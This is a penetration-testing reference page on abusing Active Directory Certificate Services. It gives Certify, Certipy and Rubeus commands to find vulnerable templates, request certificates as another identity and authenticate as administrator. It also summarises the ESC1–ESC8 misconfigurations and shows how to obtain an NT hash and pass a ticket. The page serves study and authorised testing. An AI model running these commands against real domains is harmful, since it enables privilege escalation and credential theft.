Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Active Directory Certificate Services (ADCS) manages PKI certificates. Misconfigurations enable domain escalation. Research: “Certified Pre-Owned” by SpecterOps.

Tools

Certify (Windows)

.\Certify.exe find /vulnerable
.\Certify.exe cas                    # List CAs
.\Certify.exe find                   # List templates

Certipy (Linux)

certipy find -u [email protected] -p 'password' -dc-ip DC_IP -vulnerable
certipy find -u [email protected] -p 'password' -dc-ip DC_IP -stdout

Vulnerability Summary

ESCNameDescription
ESC1Misconfigured TemplatesSAN allowed + enrollee can specify SAN + low-priv can enroll
ESC2Misconfigured TemplatesAny Purpose EKU or no EKU
ESC3Enrollment AgentEnroll on behalf of other users
ESC4ACL MisconfigurationWrite access to template → modify to ESC1
ESC5PKI Object ACLWrite access to CA objects
ESC6EDITF_ATTRIBUTESUBJECTALTNAME2CA flag allows SAN in any request
ESC7CA ACLManageCA + ManageCertificates permissions
ESC8NTLM Relay to HTTP EnrollmentRelay NTLM to web enrollment endpoint

General Exploitation Flow

1. Find vulnerable template/CA
2. Request certificate (with target identity)
3. Use certificate to authenticate (PKINIT)
4. Get TGT → access resources

Authenticate with Certificate

Certipy

certipy auth -pfx admin.pfx -dc-ip DC_IP
Returns NT hash via U2U.

Rubeus

.\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password:pfxpass /ptt

Quick Reference

TaskCommand
Find vulnscertipy find -u user -p pass -dc-ip DC -vulnerable
Certify.\Certify.exe find /vulnerable
Auth with certcertipy auth -pfx admin.pfx -dc-ip DC
List CAscertipy find -u user -p pass -dc-ip DC